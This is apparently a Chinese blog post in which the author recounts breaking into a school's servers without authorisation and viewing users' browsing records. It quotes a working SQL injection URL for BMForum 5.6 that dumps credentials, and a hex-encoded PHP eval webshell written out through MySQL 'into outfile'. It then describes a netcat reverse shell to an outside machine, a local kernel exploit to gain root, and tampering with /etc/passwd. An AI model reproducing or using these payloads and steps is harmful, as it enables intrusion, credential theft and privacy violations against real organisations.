前奏：無意間拿下了學校一臺檢測網絡訪問的服務器，無意間看到一個遠程登錄的信息，遂對此網段掃描了一下80端口。。。

上個J8，就是那個上網檢測東西。。



其實記錄的很詳細，沒有加密的聊天內容都可以看到。我還是比較尊重他人隱私的，所以只查看了一些上網行為。

剛才說了，掃了一下那個網段的80端口，有一個開著，就點進去看了一下，是BMForum 2007 5.6的論壇，php的。

老系統(tǒng)了，記得前幾年爆了個注入，也不知道是不是這個版本，上db-exploit看了一下，艸，中槍了。



————————-下面的來自db-exploit————————

BMForum 5.6 (tagname) Remote SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Date found: 30.09.08
Product: BMForum
Version: 5.6
URL: www.bmforum.com
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit:

http://localhost/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1′+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/*

# milw0rm.com [2008-10-01]



于是乎….



不用猜你就懂了，密碼是admin。

進后臺了，這個模式我不是很喜歡，翻了半天沒找到能上傳的地方。上J8。



不過，還是好好找，依然能找到可以利用的東西，發(fā)現(xiàn)了這個后臺有phpinfo()和SQL執(zhí)行。

看了一下，是root權限，也得到了web目錄，如果沒開啟魔術引號，可以考慮into outfile。

補一句：mysql的root權限在linux下一般沒什么用，有寫權限就不錯了，如果是windows系統(tǒng)，可以考慮導出udf.dll。





管理員百密一疏啊，沒開魔術引號~~蛤蛤，大快人心??！~

直接select一句話木馬，然后導出到文件~~

下面那一段十六進制字符串是www.dhdzp.com <?php eval($_REQUEST[fuck]);?> 的hex值

select 0x3C3F706870206576616C28245F524551554553545B6675636B5D293B3F3E into outfile ‘/usr/local/bmf/bmb/datafile/x.php’



然后成功得到shell。如圖。



接下來，試試菜刀里能不能執(zhí)行命令，下面就要考慮提權了。

試了一下，看似可以執(zhí)行命令，也得到了一些服務器信息。



2.6.9-22的內核，有溢出。

這個終端有個毛病，就是不能即時回顯，畢竟是通過webshell虛擬的終端，所以，還需要nc來反彈一個shell，用于溢出。

這個服務器上已經裝了nc，可是是閹割過的，不能指向bash，所以，下載源碼，編譯。

用wget在sourceforge.net上下載，就不多說了。。

編譯什么的，也是so easy。實在不行就百度一個i386架構下編譯的linux版netcat。

下面的工作就是要反彈shell了，一臺外網的機子是必須的，就算不是外網，能映射也行。

剛好手頭有個映射過端口的服務器，如果是外網服務器，就更簡單了，詳見netcat使用幫助。

http://wenku.baidu.com/view/f77334ee19e8b8f67c1cb9fe.html

好了，開始反彈吧。。。





很好，反彈成功，已經可以執(zhí)行一些低權限的命令的。

接著提權吧。上傳了一個叫做“x”的程序，用于溢出。



蛤蛤，溢出成功了，已經是root權限了，下面加用戶什么的就不說了，你懂的~~

嘮叨一句，變身成root的方法。。。修改/etc/passwd



這是我用pietty連接ssh之后，查看passwd，已經改成root了


作者 sunrise@luzix.com from：情'blog